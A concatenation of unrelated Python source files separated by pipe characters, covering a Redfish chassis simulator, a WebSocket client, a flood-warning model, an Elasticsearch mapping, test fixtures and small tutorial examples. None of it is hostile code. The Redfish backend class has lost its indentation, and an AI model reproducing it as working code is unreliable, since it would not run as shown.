import tensorflow as tf

def rl_train():
    pass

def main():
    pass

if __name__ == '__main__':
    main() |
from bitstream import *
from bitstring import *
import string
conv_64_to_40('../../../scripts/test_vector.dat', 'test_vector.dat')
conv_64_to_page('../../../scripts/test_vector.dat', 'test_vector.page')
conv_page_to_66('test_vector.page', 'test_vector.66b')
conv_64_to_66('../../../scripts/test_vector.dat', 'ref_66.dat')
|
# Copyright Notice:
# Copyright 2018 Dell, Inc. All rights reserved.
# License: BSD License. For full license text see link: https://github.com/RedDrum-Redfish-Project/RedDrum-Simulator/LICENSE.txt
# BullRed-RackManager chassisBackend resources
#
class RdChassisBackend():
# class for backend chassis resource APIs
def __init__(self,rdr):
self.version=1
self.rdr=rdr
# update resourceDB and volatileDict properties
def updateResourceDbs(self, chassisid, updateStaticProps=False, updateNonVols=True ):
#self.rdr.logMsg("DEBUG","--------BACKEND updateResourceDBs. updateStaticProps={}".format(updateStaticProps))
# for the simulator, just return--the front-end databases are not updated by the current SIM backend
return(0,False)
# Reset Chassis sled
# resetType is a property string (not a dict)
def doChassisReset(self,chassisid,resetType):
self.rdr.logMsg("DEBUG","--------BACKEND chassisReset: chassisid: {}, resetType: {}".format(chassisid,resetType))
# Simulator: set powerState as a function of resetType
powerOnStates = ["On", "GracefulRestart", "ForceRestart", "ForceOn", "PowerCycle"]
powerOffStates = ["ForceOff","GracefulShutdown" ]
if resetType in powerOnStates:
newPowerState = "On"
elif resetType in powerOffStates:
newPowerState = "Off"
else:
            newPowerState = None   # don't change it
        # Simulator: set powerState to the new value for this chassis
if newPowerState is not None:
if "Volatile" in self.rdr.root.chassis.chassisDb[chassisid]:
if "PowerState" in self.rdr.root.chassis.chassisDb[chassisid]["Volatile"]:
self.rdr.root.chassis.chassisVolatileDict[chassisid]["PowerState"] = newPowerState
# xg TODO: set power-state for any down-stream chassis that this chassis powers to same value
# xg for now, just set the power state and don't worry about it
        # Simulator: set powerState to the new value for any system that this chassis is a part of
        # If the chassis is a JBOD sled, this may not be totally correct, but it is all we can do with the current model
if "ComputerSystems" in self.rdr.root.chassis.chassisDb[chassisid]:
for systemid in self.rdr.root.chassis.chassisDb[chassisid]["ComputerSystems"]:
if systemid in self.rdr.root.systems.systemsDb:
if "Volatile" in self.rdr.root.systems.systemsDb[systemid]:
if "PowerState" in self.rdr.root.systems.systemsDb[systemid]["Volatile"]:
self.rdr.root.systems.systemsVolatileDict[systemid]["PowerState"] = newPowerState
return(0)
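    # Example sketch (the chassis id is illustrative): doChassisReset("Sled-1", "ForceOff")
    # falls in powerOffStates, so PowerState is set to "Off" for the chassis and for any
    # ComputerSystems listed under it; an unknown resetType leaves PowerState unchanged.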
# Reseat Chassis sled
def doChassisOemReseat(self, chassisid):
self.rdr.logMsg("DEBUG","--------BACKEND chassisReseat: chassisid: {} ".format(chassisid))
# Simulator: set powerState to reseat powerstate for this chassis
# only a leaf chassis (sled) can be reseated
if "Volatile" in self.rdr.root.chassis.chassisDb[chassisid]:
if "PowerState" in self.rdr.root.chassis.chassisDb[chassisid]["Volatile"]:
self.rdr.root.chassis.chassisVolatileDict[chassisid]["PowerState"] = self.rdr.backend.powerOnState
# Simulator: set powerState to reseat powerstate for any system that this chassis is a part of
        # If the chassis is a JBOD sled, this may not be totally correct, but it is all we can do with the current model
if "ComputerSystems" in self.rdr.root.chassis.chassisDb[chassisid]:
for systemid in self.rdr.root.chassis.chassisDb[chassisid]["ComputerSystems"]:
if systemid in self.rdr.root.systems.systemsDb:
if "Volatile" in self.rdr.root.systems.systemsDb[systemid]:
if "PowerState" in self.rdr.root.systems.systemsDb[systemid]["Volatile"]:
self.rdr.root.systems.systemsVolatileDict[systemid]["PowerState"] = self.rdr.backend.powerOnState
return(0)
# DO Patch to chassis (IndicatorLED, AssetTag)
# patchData is a dict with one property
# the front-end will send an individual call for IndicatorLED and AssetTag
def doPatch(self, chassisid, patchData):
        # the front-end has already validated that the patchData and chassisid are ok
# so just send the request here
self.rdr.logMsg("DEBUG","--------BACKEND Patch chassis data. patchData={}".format(patchData))
# for the simulator, just return--the front-end databases are not updated by the current SIM backend
return(0)
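    # Example sketch (values are illustrative): the front-end sends one property per call,
    # e.g. patchData={"IndicatorLED": "Blinking"} or patchData={"AssetTag": "sled-7"}.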
# update Temperatures resourceDB and volatileDict properties
# returns: rc, updatedResourceDb(T/F). rc=0 if no error
def updateTemperaturesResourceDbs(self, chassisid, updateStaticProps=False, updateNonVols=True ):
self.rdr.logMsg("DEBUG","--------BE updateTemperaturesResourceDBs. updateStaticProps={}".format(updateStaticProps))
return (0,False)
# update Fans resourceDB and volatileDict properties
# returns: rc, updatedResourceDb(T/F). rc=0 if no error
def updateFansResourceDbs(self, chassisid, updateStaticProps=False, updateNonVols=True ):
self.rdr.logMsg("DEBUG","--------BE updateFansResourceDBs. updateStaticProps={}".format(updateStaticProps))
return (0,False)
# update Voltages resourceDB and volatileDict properties
# returns: rc, updatedResourceDb(T/F). rc=0 if no error
def updateVoltagesResourceDbs(self, chassisid, updateStaticProps=False, updateNonVols=True ):
self.rdr.logMsg("DEBUG","--------BE updateVoltagesResourceDBs. updateStaticProps={}".format(updateStaticProps))
return (0,False)
# update PowerControl resourceDB and volatileDict properties
# returns: rc, updatedResourceDb(T/F). rc=0 if no error
def updatePowerControlResourceDbs(self, chassisid, updateStaticProps=False, updateNonVols=True ):
self.rdr.logMsg("DEBUG","--------BE updatePowerControlResourceDBs. ")
resDb=self.rdr.root.chassis.powerControlDb[chassisid]
resVolDb=self.rdr.root.chassis.powerControlVolatileDict[chassisid]
updatedResourceDb=False
rc=0 # 0=ok
return(rc,updatedResourceDb)
# DO Patch to chassis PowerControl
# the front-end will send an individual call for each property
def patchPowerControl(self, chassisid, patchData):
self.rdr.logMsg("DEBUG","--------BACKEND Patch chassis PowerControl data. patchData={}".format(patchData))
# just call the dbus call to set the prop
return(0)
# update PowerSupplies resourceDB and volatileDict properties
# updated volatiles: LineInputVoltage, LastPowerOutputWatts, Status
# returns: rc, updatedResourceDb(T/F). rc=0 if no error
def updatePowerSuppliesResourceDbs(self, chassisid, updateStaticProps=False, updateNonVols=True ):
self.rdr.logMsg("DEBUG","--------BE updatePowerSuppliesResourceDBs. updateStaticProps={}".format(updateStaticProps))
resDb=self.rdr.root.chassis.powerSuppliesDb[chassisid]
resVolDb=self.rdr.root.chassis.powerSuppliesVolatileDict[chassisid]
return (0,False)
|
# HTTP status codes
HTTP_200_OK = 200
HTTP_201_CREATED = 201
HTTP_204_NO_CONTENT = 204
HTTP_404_NOT_FOUND = 404
HTTP_405_METHOD_NOT_ALLOWED = 405
HTTP_409_CONFLICT = 409
|
"""Part of Nussschale.
MIT License
Copyright (c) 2017-2018 LordKorea
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Module Deadlock Guarantees:
When the mutex of the configuration is locked no other locks can be
requested. Thus the configuration lock cannot be part of any deadlock.
"""
from json import dump, load
from os.path import exists
from threading import RLock
from typing import Dict, TypeVar, Union, cast
from nussschale.util.locks import mutex
# Type for configuration values
T = TypeVar("T", str, int, bool)
class Config:
"""Manages the JSON configuration file."""
# The configuration file where keys and values will be stored
_CONFIG_FILE = "./data/nussschale.json"
def __init__(self) -> None:
"""Constructor."""
# MutEx for configuration access.
# Locking this MutEx can't cause any other MutExes to be locked.
self._lock = RLock()
# The configuration cache which keeps the configuration in memory
self._configuration = {} # type: Dict[str, Union[str, int, bool]]
# Create file, if not exists
if not exists(Config._CONFIG_FILE):
with open(Config._CONFIG_FILE, "w") as f:
dump(self._configuration, f, indent=4, sort_keys=True)
# Get configuration
with open(Config._CONFIG_FILE, "r") as f:
self._configuration = cast(Dict[str, Union[str, int, bool]],
load(f))
@mutex
def get(self, key: str, default: T) -> T:
"""Gets the value for the given configuration key.
If the configuration key has no associated value then a default value
will be set.
Args:
key: The configuration key.
default: The default value for the configuration key.
Returns:
The value of the configuration key (or the default).
Contract:
This method locks the configuration lock.
"""
# Set the default and write-back
if key not in self._configuration:
self._configuration[key] = default
with open(Config._CONFIG_FILE, "w") as f:
dump(self._configuration, f, indent=4, sort_keys=True)
val = cast(T, self._configuration[key]) # type: T
return val
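# A minimal usage sketch (the key name and default value are illustrative): on the
# first access of an unknown key, get() writes the default back to
# ./data/nussschale.json, so later calls return the persisted value.
#
#   config = Config()
#   port = config.get("port", 8091)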
|
'''
This interactive WebSocket client allows the user to send frames to a WebSocket
server, including text message, ping, and close frames.
To use SSL/TLS: install the `trustme` package from PyPI and run the
`generate-cert.py` script in this directory.
'''
import argparse
import logging
import pathlib
import ssl
import sys
import urllib.parse
import trio
from trio_websocket import open_websocket_url, ConnectionClosed, HandshakeError
logging.basicConfig(level=logging.DEBUG)
here = pathlib.Path(__file__).parent
def commands():
''' Print the supported commands. '''
print('Commands: ')
print('send <MESSAGE> -> send message')
print('ping <PAYLOAD> -> send ping with payload')
print('close [<REASON>] -> politely close connection with optional reason')
print()
def parse_args():
''' Parse command line arguments. '''
parser = argparse.ArgumentParser(description='Example trio-websocket client')
parser.add_argument('--heartbeat', action='store_true',
help='Create a heartbeat task')
parser.add_argument('url', help='WebSocket URL to connect to')
return parser.parse_args()
async def main(args):
''' Main entry point, returning False in the case of logged error. '''
if urllib.parse.urlsplit(args.url).scheme == 'wss':
# Configure SSL context to handle our self-signed certificate. Most
# clients won't need to do this.
try:
ssl_context = ssl.create_default_context()
ssl_context.load_verify_locations(here / 'fake.ca.pem')
except FileNotFoundError:
logging.error('Did not find file "fake.ca.pem". You need to run'
' generate-cert.py')
return False
else:
ssl_context = None
try:
logging.debug('Connecting to WebSocket…')
async with open_websocket_url(args.url, ssl_context) as conn:
await handle_connection(conn, args.heartbeat)
except HandshakeError as e:
logging.error('Connection attempt failed: %s', e)
return False
async def handle_connection(ws, use_heartbeat):
''' Handle the connection. '''
logging.debug('Connected!')
try:
async with trio.open_nursery() as nursery:
if use_heartbeat:
nursery.start_soon(heartbeat, ws, 1, 15)
nursery.start_soon(get_commands, ws)
nursery.start_soon(get_messages, ws)
except ConnectionClosed as cc:
reason = '<no reason>' if cc.reason.reason is None else '"{}"'.format(
cc.reason.reason)
print('Closed: {}/{} {}'.format(cc.reason.code, cc.reason.name, reason))
async def heartbeat(ws, timeout, interval):
'''
Send periodic pings on WebSocket ``ws``.
Wait up to ``timeout`` seconds to send a ping and receive a pong. Raises
``TooSlowError`` if the timeout is exceeded. If a pong is received, then
wait ``interval`` seconds before sending the next ping.
This function runs until cancelled.
:param ws: A WebSocket to send heartbeat pings on.
:param float timeout: Timeout in seconds.
:param float interval: Interval between receiving pong and sending next
ping, in seconds.
:raises: ``ConnectionClosed`` if ``ws`` is closed.
:raises: ``TooSlowError`` if the timeout expires.
:returns: This function runs until cancelled.
'''
while True:
with trio.fail_after(timeout):
await ws.ping()
await trio.sleep(interval)
async def get_commands(ws):
''' In a loop: get a command from the user and execute it. '''
while True:
cmd = await trio.to_thread.run_sync(input, 'cmd> ',
cancellable=True)
if cmd.startswith('ping'):
payload = cmd[5:].encode('utf8') or None
await ws.ping(payload)
elif cmd.startswith('send'):
message = cmd[5:] or None
if message is None:
logging.error('The "send" command requires a message.')
else:
await ws.send_message(message)
elif cmd.startswith('close'):
reason = cmd[6:] or None
await ws.aclose(code=1000, reason=reason)
break
else:
commands()
        # Allow time to receive the response and print logs:
await trio.sleep(0.25)
async def get_messages(ws):
''' In a loop: get a WebSocket message and print it out. '''
while True:
message = await ws.get_message()
print('message: {}'.format(message))
if __name__ == '__main__':
try:
if not trio.run(main, parse_args()):
sys.exit(1)
except (KeyboardInterrupt, EOFError):
print()
|
# -*- coding: utf-8 -*-
###############################################################################
# PREP-FEWS
# Social Preparedness in Early Warning Systems model
#
# Model modules
#
# Marc Girons Lopez, Giuliano di Baldassarre, Jan Seibert
###############################################################################
import os
import numpy as np
import pandas as pd
from scipy import stats
from collections import Counter
###############################################################################
# FORECASTING SYSTEM
###############################################################################
class ForecastingSystem(object):
"""Define the technical capabilities, in terms of precision and accuracy,
of a flood forecasting system.
"""
def __init__(self, acc_mean, acc_sd, prc_shape, prc_scale):
""" Initialize the class with the parameter values
"""
self.mean = acc_mean
self.sd = acc_sd
self.shape = prc_shape
self.scale = prc_scale
def issue_forecast(self, event):
"""Generate a random probabilistic flood forecast based on the
following conceptualization: F=N(event+N(mu,sigma),gamma(shape,scale)).
Returns a tuple with the mean and sd of the forecast.
"""
deviation = np.random.normal(loc=self.mean, scale=self.sd)
mean = event + deviation
sd = np.random.gamma(shape=self.shape, scale=self.scale)
return (mean, sd)
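# A minimal sketch of how a forecast is drawn (parameter values are illustrative):
# the forecast mean is the true event magnitude plus a normal accuracy error
# N(acc_mean, acc_sd), and the forecast sd (precision) is an independent
# gamma(prc_shape, prc_scale) draw.
#
#   fs = ForecastingSystem(acc_mean=0.0, acc_sd=0.1, prc_shape=2.0, prc_scale=0.05)
#   mean, sd = fs.issue_forecast(event=1.0)   # e.g. (1.03, 0.08)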
###############################################################################
# WARNING ASSESSMENT
###############################################################################
class WarningAssessment(object):
"""Assess the outcome of the flood warning system based on a simple
contingency table drawing from decisions on the flood magnitude at and
from which warnings are to be issued (mag_thr) and the required
likelihood of the forecast for warning to be issued (prob_thr).
"""
def __init__(self, mag_thr, prob_thr):
""" Initialize the class with the parameter values
"""
self.mag_thr = mag_thr
self.prob_thr = prob_thr
def assess_warning_outcome(self, event, forecast):
"""Define the contingency table used for evaluating the warnings.
Returns a string describing the warning outcome
"""
cdf = stats.norm(loc=forecast[0], scale=forecast[1]).cdf(self.mag_thr)
aep = 1. - cdf # annual exceedance probability
if event < self.mag_thr and aep < self.prob_thr:
return 'true negative' # all clear
elif event < self.mag_thr and aep >= self.prob_thr:
return 'false positive' # false alarm
elif event >= self.mag_thr and aep < self.prob_thr:
return 'false negative' # missed event
        elif event >= self.mag_thr and aep >= self.prob_thr:
return 'true positive' # hit, successful alarm
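# Worked sketch (threshold values are illustrative): with mag_thr=1.0 and
# prob_thr=0.5, a forecast of (mean=1.2, sd=0.2) gives an exceedance probability
# aep = 1 - Phi((1.0 - 1.2) / 0.2) ~= 0.84 >= prob_thr, so a warning is issued;
# the outcome is then 'true positive' if the event magnitude is >= 1.0 and
# 'false positive' otherwise.
#
#   wa = WarningAssessment(mag_thr=1.0, prob_thr=0.5)
#   wa.assess_warning_outcome(event=1.3, forecast=(1.2, 0.2))   # 'true positive'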
###############################################################################
# LOSS ESTIMATION
###############################################################################
class LossEstimation(object):
"""Define how the different warning outcomes and preparedness level affect
the losses incurred by the system
"""
def __init__(self, dmg_thr, dmg_shape, res_dmg, mit_cst):
"""initialize the class with the parameters values
"""
self.dmg_thr = dmg_thr
self.dmg_shape = dmg_shape
self.res_dmg = res_dmg
self.mit_cst = mit_cst
def estimate_damage(self, event):
"""Calculate the damage produced by a flood event of a
        specified magnitude.
Returns a float representing the damage magnitude.
"""
if event < self.dmg_thr:
return 0.
else:
return 1. - np.exp(-((event - self.dmg_thr) / self.dmg_shape))
def estimate_residual_damage(self, damage, preparedness):
"""Calculate the residual damage given a specific disaster damage
magnitude and preparedness level.
Returns a float representing the residual damage magnitude
"""
dmg_fun = np.log(1 / self.res_dmg)
return damage * np.exp(- dmg_fun * preparedness)
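    # Worked sketch (parameter values are illustrative): with dmg_thr=1.0 and
    # dmg_shape=0.5, an event of magnitude 1.5 causes damage
    # 1 - exp(-(1.5 - 1.0) / 0.5) = 1 - exp(-1) ~= 0.63. With res_dmg=0.2, the
    # residual damage at full preparedness (1.0) is 0.63 * exp(-ln(1/0.2)) =
    # 0.63 * 0.2 ~= 0.13, i.e. res_dmg is the fraction of damage that remains
    # when the system is fully prepared.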
def get_warning_damage(self, event, warning_outcome, preparedness):
"""Calculate the flood-related damages for the different warning
outcomes after a flood event has taken place.
Returns a float representing the damage magnitude.
"""
if warning_outcome == 'true positive':
damage = self.estimate_damage(event)
return self.estimate_residual_damage(damage, preparedness)
else:
return self.estimate_damage(event)
def get_warning_loss(self, event, warning_outcome, preparedness):
"""Calculate the flood-related losses (damage + costs) for the
different warning outcomes after a flood event has taken place.
Returns a float representing the loss magnitude.
"""
damage = self.estimate_damage(event)
if warning_outcome == 'true positive':
residual_damage = self.estimate_residual_damage(damage, preparedness)
return residual_damage + event * self.mit_cst
elif warning_outcome == 'false positive':
return damage + event * self.mit_cst
else:
return damage
###############################################################################
# DISASTER PREPAREDNESS
###############################################################################
class SocialPreparedness(object):
"""Assess the disaster preparedness level as a function of
the recency of flood events.
"""
def __init__(self, shock, half_life):
# set parameters
self.shock = shock
# calculate the decay constants as a function of the half-life
self.decay_ct = np.log(2) / half_life
def update_preparedness(self, damage, preparedness):
"""Calculate the impact of the different warning outcomes on the
disaster preparedness level.
Returns a float (0,1] representing the degree of preparedness.
"""
if damage == 0.:
prep_tmp = preparedness - self.decay_ct * preparedness
else:
prep_tmp = preparedness + self.shock * damage
# minimum preparedness value is 1%, set it as a variable?
return np.clip(prep_tmp, 0.01, 1.)
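# Worked sketch (parameter values are illustrative): with half_life=10 the decay
# constant is ln(2) / 10 ~= 0.069, so a time step without damage lowers a
# preparedness of 0.50 to 0.50 - 0.069 * 0.50 ~= 0.47, while a step with
# shock=2.0 and damage 0.3 raises it to min(0.50 + 2.0 * 0.3, 1.0) = 1.0.
# Preparedness is always clipped to the interval [0.01, 1.0].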
###############################################################################
# MODEL EVALUATION
###############################################################################
class ModelEvaluation(object):
"""Assess the efficiency of the model according to different
metrics.
"""
def __init__(self):
self.tn = None
self.fn = None
self.fp = None
self.tp = None
def count_warning_outcomes(self, outcome_ls):
"""Calculate the number of occurrences of each warning outcome in the
time series.
        Stores an integer count for each warning outcome as an attribute.
"""
count = Counter(outcome_ls)
self.tn = count['true negative']
self.fn = count['false negative']
self.fp = count['false positive']
self.tp = count['true positive']
def flood_frequency(self):
"""Calculate the frequency of occurrence of flood events.
Returns a float representing the disaster frequency [0, 1]
"""
return (self.tp + self.fn) / (self.tn + self.fn + self.fp + self.tp)
def return_period(self):
"""Calculate the return period of flood events.
Returns a float representing the return period in years.
"""
if self.tp + self.fn == 0.:
# raise ValueError('No flood events recorded in the time series.')
return None
else:
return (self.tn + self.fn + self.fp + self.tp + 1) / (self.tp + self.fn)
def hit_rate(self):
"""Calculate the hit rate (probability of detection)
of the warning system.
Returns a float representing the hit rate [0, 1]
"""
if self.fn + self.tp == 0.:
# raise ValueError('No flood events recorded in the time series.')
return None
else:
return self.tp / (self.fn + self.tp)
def false_alarm_rate(self):
"""Calculate the false alarm rate (probability of false detection)
for the warning system.
Returns a float representing the false alarm rate [0, 1]
"""
if self.tn + self.fp == 0.:
# raise ValueError('No normal events recorded in the time series.')
return None
else:
return self.fp / (self.tn + self.fp)
def false_alarm_ratio(self):
"""Calculate the false alarm ratio for the warning system.
Returns a float representing the false alarm ratio [0, 1]
"""
if self.fp + self.tp == 0.:
# raise ValueError('No alarms were raised during these period.')
return None
else:
return self.fp / (self.fp + self.tp)
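    # Worked sketch: for counts tn=90, fn=2, fp=5, tp=3 over 100 time steps, the
    # flood frequency is (3 + 2) / 100 = 0.05, the return period is
    # (100 + 1) / 5 = 20.2 years, the hit rate is 3 / (2 + 3) = 0.6, the false
    # alarm rate is 5 / (90 + 5) ~= 0.053 and the false alarm ratio is
    # 5 / (5 + 3) = 0.625.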
def relative_loss(self, climate_loss_ls, warning_loss_ls):
"""Calculate the relative loss produced by the mitigation measures.
Returns a float representing the relative loss [0, 1]
"""
# check if there is any non-null element in the list
        if not any(climate_loss_ls):
# raise ValueError('No flood events produced losses to the system.')
return None
else:
return sum(warning_loss_ls) / sum(climate_loss_ls)
def calculate_statistics(self, outcome_ls, climate_loss_ls,
warning_loss_ls, preparedness_ls):
"""Calculate the statistics for the model output
"""
self.count_warning_outcomes(outcome_ls)
self.stats = {'Probability of occurrence': self.flood_frequency(),
'Return period (yrs)': self.return_period(),
'Hit rate': self.hit_rate(),
'False alarm rate': self.false_alarm_rate(),
'False alarm ratio': self.false_alarm_ratio(),
'Relative loss': self.relative_loss(climate_loss_ls,
warning_loss_ls),
'Average preparedness': np.average(preparedness_ls)
}
def save_statistics(self, statfile, mode='single_run'):
"""write the statistics to the output file
"""
        path_out = os.path.join(os.getcwd(), '..', 'output', mode) + os.sep
if not os.path.exists(path_out):
os.makedirs(path_out)
if mode == 'single_run':
df = pd.DataFrame.from_dict(self.stats, orient='index')
df.to_csv(path_out + statfile, sep='\t', header=False)
elif mode == 'monte_carlo':
self.mc_stats.to_csv(path_out + statfile, index=False) |
#
# Copyright 2019-2020 Lukas Schmelzeisen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import csv
from datetime import datetime
from pathlib import Path
from typing import Iterator, Mapping, MutableMapping
from elasticsearch_dsl import Date, Float, Keyword, Text
from nasty_data import BaseDocument
from nasty_utils import DecompressingTextIOWrapper
from typing_extensions import Final
_INDEX_OPTIONS: Final[str] = "offsets"
_INDEX_PHRASES: Final[bool] = False
_INDEX_TERM_VECTOR: Final[str] = "with_positions_offsets"
class MaxqdaCodedNastyDocument(BaseDocument):
document_group = Keyword()
code_identifier = Keyword()
lang = Keyword()
created_at = Date()
code = Keyword()
segment = Text(
index_options=_INDEX_OPTIONS,
index_phrases=_INDEX_PHRASES,
term_vector=_INDEX_TERM_VECTOR,
analyzer="standard",
)
coverage = Float()
@classmethod
def prepare_doc_dict(cls, doc_dict: MutableMapping[str, object]) -> None:
super().prepare_doc_dict(doc_dict)
doc_dict.pop("Farbe")
doc_dict.pop("Kommentar")
doc_dict["document_group"] = doc_dict.pop("Dokumentgruppe")
doc_dict["created_at"] = datetime.strptime(
doc_dict.pop("Dokumentname"), "%d.%m.%Y %H:%M:%S"
)
doc_dict["_id"] = (
str(doc_dict["code_identifier"]) + "-" + str(doc_dict.pop("i"))
)
doc_dict["code"] = doc_dict.pop("Code")
doc_dict["segment"] = doc_dict.pop("Segment")
doc_dict["coverage"] = float(doc_dict.pop("Abdeckungsgrad %"))
def load_document_dicts_from_maxqda_coded_nasty_csv(
file: Path,
code_identifier: str,
lang: str,
progress_bar: bool = True,
) -> Iterator[Mapping[str, object]]:
with DecompressingTextIOWrapper(
file, encoding="UTF-8", warn_uncompressed=False, progress_bar=progress_bar
) as fin:
reader = csv.DictReader(fin)
for i, document_dict in enumerate(reader):
document_dict["i"] = i
document_dict["code_identifier"] = code_identifier
document_dict["lang"] = lang
yield document_dict
|
# Name: Reetesh Zope
# Student ID: 801138214
# Email ID: [email protected]
"""
main.py
_______
- Takes network file input from command line containing - <source> <destination> <transmission time>
- Accepts user queries and does network operations accordingly on the network graph
"""
from graph import Graph
def main():
graphObj = Graph()
while True:
command = input("")
command = command.strip().split(" ")
if command[0] == "addedge":
graphObj.addEdge(command[1], command[2], command[3])
elif command[0] == "path":
graphObj.findShortestPath(command[1], command[2])
elif command[0] == "deleteedge":
graphObj.deleteEdge(command[1], command[2])
elif command[0] == "edgedown":
graphObj.takeEdgeUpOrDown(command[1], command[2], False)
elif command[0] == "edgeup":
graphObj.takeEdgeUpOrDown(command[1], command[2], True)
elif command[0] == "vertexdown":
graphObj.takeVertexUpOrDown(command[1], False)
elif command[0] == "vertexup":
graphObj.takeVertexUpOrDown(command[1], True)
elif command[0] == "reachable":
graphObj.printReachables()
elif command[0] == "print":
graphObj.printGraph()
elif command[0] == "graph":
fin = command[1]
with open(fin) as f:
edges = f.readlines()
graphObj.createGraph(edges)
elif command[0] == "quit":
break
else:
print("Invalid query")
if __name__=="__main__":
main()
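# Interaction sketch (vertex names, file name and transmission times are
# illustrative); the "graph" command loads a file containing one
# "<source> <destination> <transmission time>" edge per line:
#
#   graph network.txt
#   addedge Belk Grigg 1.2
#   path Belk Grigg
#   print
#   quit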
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Pytest configuration."""
from __future__ import absolute_import, print_function
import os
import shutil
import sys
import tempfile
import pytest
from flask import Flask
from invenio_db import InvenioDB
from sqlalchemy_utils.functions import create_database, database_exists, \
drop_database
from invenio_search import InvenioSearch
sys.path.append(
os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))),
'tests/mock_module'))
@pytest.fixture()
def app():
"""Flask application fixture."""
# Set temporary instance path for sqlite
instance_path = tempfile.mkdtemp()
app = Flask('testapp', instance_path=instance_path)
app.config.update(
TESTING=True
)
InvenioSearch(app)
with app.app_context():
yield app
# Teardown instance path.
shutil.rmtree(instance_path)
def mock_iter_entry_points_factory(data, mocked_group):
"""Create a mock iter_entry_points function."""
from pkg_resources import iter_entry_points
def entrypoints(group, name=None):
if group == mocked_group:
for entrypoint in data:
yield entrypoint
else:
for x in iter_entry_points(group=group, name=name):
yield x
return entrypoints
@pytest.fixture()
def template_entrypoints():
"""Declare some events by mocking the invenio_stats.events entrypoint.
It yields a list like [{event_type: <event_type_name>}, ...].
"""
eps = []
for idx in range(5):
event_type_name = 'mock_module'
from pkg_resources import EntryPoint
entrypoint = EntryPoint(event_type_name, event_type_name)
entrypoint.load = lambda: lambda: ['mock_module.templates']
eps.append(entrypoint)
entrypoints = mock_iter_entry_points_factory(
eps, 'invenio_search.templates')
return entrypoints
|
import json, os
from azure.storage.queue import (
QueueService,
QueueMessageFormat
)
import azure.functions as func
from NewDeclarationInQueue.formular_converter import FormularConverter
from NewDeclarationInQueue.preprocess.document_location import DocumentLocation
from NewDeclarationInQueue.preprocess.ocr_constants import OcrConstants
from NewDeclarationInQueue.preprocess_two_steps import PreProcessTwoSteps
from NewDeclarationInQueue.processfiles.ocr_worker import OcrWorker
from NewDeclarationInQueue.processfiles.process_messages import ProcessMessages
def main(msg: func.QueueMessage) -> None:
message_str = msg.get_body().decode('utf-8')
data = json.loads(message_str)
two_steps = PreProcessTwoSteps()
process_messages = ProcessMessages('OCR Process', msg.id)
ocr_constants = two_steps.get_constats()
ocr_file, process_messages = two_steps.get_file_info(data, process_messages)
# TODO: this has to be done later, based on what the composite model returns
# TODO: including when it returns a document it does not recognize
#formular_converter = FormularConverter()
#ocr_formular = formular_converter.get_formular_info(ocr_constants, ocr_file)
#TODO: point of divergence, here call a method that uses the composite model
#process_messages = two_steps.process_document(ocr_file, ocr_constants, ocr_formular, process_messages)
process_messages = two_steps.process_document_with_custom_model(ocr_file, ocr_constants, process_messages)
two_steps.save_in_output_queue(data, process_messages)
|
# Example program for the book "Python Challenge"
#
# Copyright 2020 by Michael Inden
print([1, 2, 3, 2].index(2)) # => 1
print([i for i, value in enumerate([1, 2, 3, 2, 4, 2]) if value == 2]) # => [1, 3, 5]
print([1, 2, 3, 2, 4, 2].count(2)) # => 3
programmers = {"Michael": "Python",
"Tim": "C++",
"Karthi": "Java"}
if "Karthi" in programmers.keys():
print("Karthi is here")
# Python short form
if "Karthi" in programmers:
print("Karthi is here II")
if "C++" in programmers.values():
print("someone knows C++")
if ("Michael", "Python") in programmers.items():
print("Michael knows Python")
# The following naive attempts raise an error, because `[7, 2] in [...]` tests for
# the whole list as a single element and all()/any() then receive a plain bool:
# print(all([7, 2] in [2, 3, 5, 7, 9]))  # => TypeError: 'bool' object is not iterable
# print(any([7, 2] in [2, 3, 5, 7, 9]))  # => TypeError: 'bool' object is not iterable
# print(any([4] in [2, 3, 5, 7, 9]))     # => TypeError: 'bool' object is not iterable
# Alternative with more flexibility
print(all(elem in [2, 3, 5, 7, 9] for elem in [7, 2]))
print(any(elem in [2, 3, 5, 7, 9] for elem in [7, 2]))
print(any(elem in [2, 3, 5, 7, 9] for elem in [4]))
print("Hallo".rindex("l"))
print("Hallo".rfind("l"))
print("Hallo".rfind("x")) # => -1
# print("Hallo".rindex("x")) # => ValueError: substring not found
def last_index_of(values, search_for):
for pos in range(len(values) - 1, -1, -1):
if values[pos] == search_for:
return pos
return -1
print(last_index_of([1, 2, 3, 2, 4, 2, 5, 2], 2)) # => 7
values = [0] * 13
print(values)
values[2] = 7
values[7] = 2
print(values)
|
from .serval import builder
from .srv import main |
# Copyright 2019 Martin Olejar
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from easy_enum import Enum
